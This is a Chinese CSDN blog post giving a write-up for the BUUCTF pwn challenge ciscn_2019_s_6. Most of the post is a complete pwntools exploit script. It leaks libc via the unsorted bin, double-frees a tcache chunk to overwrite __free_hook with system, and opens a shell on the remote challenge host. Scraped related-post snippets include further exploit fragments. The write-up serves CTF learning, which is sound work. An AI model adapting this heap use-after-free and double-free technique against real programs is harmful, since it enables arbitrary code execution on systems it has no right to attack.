ciscn_2019_s_6(uaf)

于 2021-11-16 12:53:19 发布
阅读量361 收藏
点赞数
文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51251108/article/details/121353453
版权
该博客详细介绍了如何利用未初始化指针(use-after-free, uaf)漏洞进行攻击。通过unsortbin泄露libc地址,然后通过doublefree劫持free_hook为system,最终实现对system函数的控制。博主展示了整个过程,包括添加、删除、显示公司名的函数调用,以及如何计算libc基址和关键地址。最后,通过一系列精心构造的操作触发漏洞,进入交互模式。
摘要由CSDN通过智能技术生成

ciscn_2019_s_6:

保护全开
请添加图片描述

漏洞分析:

指针未清零,存在uaf
请添加图片描述

大致步骤:

利用unsortbin泄露libc,doublefree劫持free_hook为system

exp:

from pwn import *
local_file  = './ciscn_s_6'
local_libc  = './libc-2.27.so'
remote_libc = './libc-2.27.so'
select = 1
if select == 0:
    r = process(local_file)
    libc = ELF(local_libc)
else:
    r = remote('node4.buuoj.cn',27542 )
    libc = ELF(remote_libc)
elf = ELF(local_file)
context.log_level = 'debug'
context.arch = elf.arch
se      = lambda data               :r.send(data)
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims                         :r.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
def debug(cmd=''):
     gdb.attach(r,cmd)
#---------------------
def add(size,name):
    sla('choice:','1')
    sla('Please input the size of compary\'s name\n',str(size))
    sa('please input name:\n',name)
    sa('please input compary call:\n','198')
def show(index):
    sla('choice:','2')
    sla('Please input the index:\n',str(index))
def delete(index):
    sla('choice:','3')
    sla('Please input the index:',str(index))
#---------------------
add(0x410,'aaaa')
add(0x30,'/bin/sh\x00')
delete(0)
show(0)
libc_base=uu64(ru('\x7f')[-6:])-96-0x10-libc.sym['__malloc_hook']
print 'libc_base='+str(hex(libc_base))
free_hook=libc_base+libc.sym['__free_hook']
system=libc_base+libc.sym['system']
#-------------------------
add(0x30,'aaaa')
delete(2)
delete(2)
add(0x30,p64(free_hook))
add(0x30,p64(0))
add(0x30,p64(system))
delete(1)
#debug()
r.interactive()
Nq0inaen
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BUUCTF-PWN刷题记录-8
weixin_44145820的博客
04-16 897
目录roarctf_2019_realloc_magic roarctf_2019_realloc_magic
ciscn_2019_s_6
xieyichensss的博客
06-19 361
这道题好坑呜呜。 远程没有doubel free检查,而本地有。 所以我tmd调了一天的脚本 这里我就简单说下思路吧:能做到这道题的师傅都很强 1.保护全开,没有后门函数,就想到改malloc_hook或者free_hook为system函数或者onegadget,这道题的远程没有double free检查。 2.我们要先泄露libc基址,需要用unsorted_bin头为main_arena+88计算。 3.然后就有很多方法getshell了,如1所述。用double free来add堆块到free_ho
ciscn_2019_ne_6(指针未初始化漏洞)
seaaseesa的博客
06-11 580
ciscn_2019_ne_6(指针未初始化漏洞) 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,在delete功能里,ptr指针存在未初始化的漏洞,因此其ptr的值可以通过其他函数来控制,造成任意地址free。 我们可以利用check函数来控制ptr未初始化之前的值 然后构造double free,劫持free_hook即可。 #coding:utf8 from pwn import * #sh = process('./ciscn_2019_ne_6') sh =
ciscn_2019_s_4
doudoudedi
01-26 994
可以看到有栈溢出的漏洞能过控制执行流 exp: #!/usr/bin/python2 from pwn import * from LibcSearcher import * local=0 if local==1: p=process('./ciscn_s_4') elf=ELF('./ciscn_s_4') #libc=elf.libc else: p=remo...
uaf42.zip_uaf42_uaf42 design_uaf42-data
09-23
标题中的“uaf42.zip_uaf42_uaf42 design_uaf42-data”表明这是一份关于“uaf42”设计的压缩文件,重点在于“uaf42”的设计及其相关数据。描述中提到的是使用“uaf42”设计的有源滤波器,并记录了高通滤波器的设计...
2021_UAF_SE_Nhom06
03-20
【标题】"2021_UAF_SE_Nhom06" 指的可能是一个软件工程项目的代码库,其中“UAF”可能是大学或机构的缩写,“SE”代表“Software Engineering”(软件工程),而“Nhom06”可能是项目组的编号或者课程的学期编号。...
eID_fido-uaf-core
05-14
标题 "eID_fido-uaf-core" 暗示了这是一个与电子身份证(eID)相关的项目,它利用了FIDO UAF(Universal Authentication Framework)核心技术。FIDO UAF是一种安全的身份验证标准,旨在提供强认证,以保护用户免受...
fido-uaf-v1.0-rd-20141008.zip_FIDO UAF1.0Client_U2F_fido uaf1.0
09-19
FIDO U2F协议依赖于一个加强的加密第二...最终用户携带一个简单的U2F设备可以用于任何支持该协议的应用上。用户得到一个通过一个简单的KEY设备得到一个安全的环境。这个文档是对U2F协议和一个阅读详细文当前的概述。
fido_uaf_certification_adapter:金雅拓FIDO UAF认证服务器的认证适配器
05-15
项目名称FIDO UAF一致性工具适配器先决条件Gematlo FIDO UAF服务器已启动并正在运行。正在安装将适配器部署到Tomcat 8.x应用程序服务器。 FIDO UAF服务器的URL由环境变量UAF_SERVER设置已知问题/局限性不支持TLS ...
pwnciscn_2019_s_3
Nothing
12-14 4523
这题是全国大学生信息安全竞赛的一道线下半决赛题目,好像是华南赛区? 例行检查。 分析程序。 vul函数 两个系统调用,一个是sys_read,一个是sys_write,往栈上写数据(0x400),从栈上读数据(0x30),存在栈溢出。 还有一个gadget函数。 有两个值得注意的地方。mov rax,0fh 以及mov rax 59。这两个gadget控制了rax的值,看看这两个是什么系统调用...
[BUUCTF]PWN6——ciscn_2019_c_1
mcmuyanga的博客
08-25 6985
[BUUCTF]PWN6——ciscn_2019_c_1 题目网址:https://buuoj.cn/challenges#ciscn_2019_c_1 步骤: 例行检查,64位,开启了nx保护 nc一下,看看输入点的字符串,三个选项加密、解密、退出 用64位ida打开,先是shift+f12查看一下程序里的字符串 没有发现system函数和字符串“bin/sh”,先根据输入点的字符串查看一下主要函数 就像一开始说的程序的功能就是加密和解密,看伪代码可以知道,只有选1的时候才会调用encrypt()
ciscn_2019_sw_5(tcache下delete次数限制时的巧妙利用手法)
seaaseesa的博客
05-01 715
ciscn_2019_sw_5(tcache下delete次数限制时的巧妙利用手法) 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,仅两个功能 其中,delete功能只能用3次,delete功能没有清空指针,存在double free漏洞。 Add功能,size不可控,结尾printf可以输出堆内容。 我们可以利用add结尾的printf输出,main_are...
ciscn_2019_sw_7
seaaseesa的博客
05-01 535
ciscn_2019_sw_7 首先检查一下程序的保护机制 然后,我们用IDA分析一下,最多创建10个堆,并且size不能超过0x60 Delete功能没有清空指针,因此可以double free。 由于size受限制,因此我们需要伪造一个unsorted bin范围的chunk,glibc版本2.27,存在tcache,因此,我们还要先攻击tcache bin表头,篡改对应的...
buuoj Pwn writeup 171-175
yongbaoii的博客
06-09 336
171 wdb_2018_1st_babyheap add edit 只能编辑三次。 show free 简单的uaf。 我们可以通过unlink来泄露地址,劫持free_hook。 要注意的是它自己写的一个输入函数。 要么就回车截断,要么就输入32个。所以我们在写exp的时候如果是32字节,就不要加回车,如果不够32个字节,就一定要加回车,不然输入是截断不了的。 先通过double free泄露地址,然后把heap_base + 0x10的chunk申请到。并且把heap_base再挂进去。 将h
ciscn_2019_s_3
qq_45691294的博客
12-29 2160
首先拿到程序先查看一下程序类型 是一个x86-64的ELF文件,查看一下保护,只开启了堆栈不可执行保护 用IDA分析一下该程序 main函数直接进入到vuln函数,这里利用了系统调用,64位的系统调用的传参方式为 首先将系统调用号 传入 rax,然后将参数 从左到右 依次存入 rdi,rsi,rdx寄存器中,返回值存在rax寄存器 vuln函数执行了read(0,buf,0x400),又执行了write(1,buf,0x30)。看一下buf的位置,发现距离rbp只有0x10大小,存在栈溢出 这里的栈
Uniapp软件库全新带勋章功能/包含前后端源码
08-14
Uniapp软件库全新带勋章功能,搭建好后台 在前端找到 util 这个文件 把两个js文件上面的填上自己的域名,电脑需要下载:HBuilderX 登录账号 没有账号就注册账号,然后上传文件,打包选择 “发行” 可以打包app h5等等。 后端安装: 1、下载源码到服务器目录 2、设置运行目录为 public 3、配置伪静态 4、修改数据库账号密码config/database.php点击导入, 5、访问域名即可
【独家首发】基于矮猫鼬优化算法DMOA-GMDH的锂电池寿命SOC估计算法研究Matlab实现.rar
最新发布
08-14
1.版本:matlab2014/2019a/2024a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 替换数据可以直接使用,注释清楚,适合新手
UAF:统一企业架构框架详解
"UAF-for-Incose" Unified Architecture Framework(UAF)是一种企业架构框架,它是Unified Profile for DoDAF and MoDAF (UPDM)的下一代版本,有时也被称为UPDM 3。UAF的设计目的是为类似于DoDAF(Department of ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值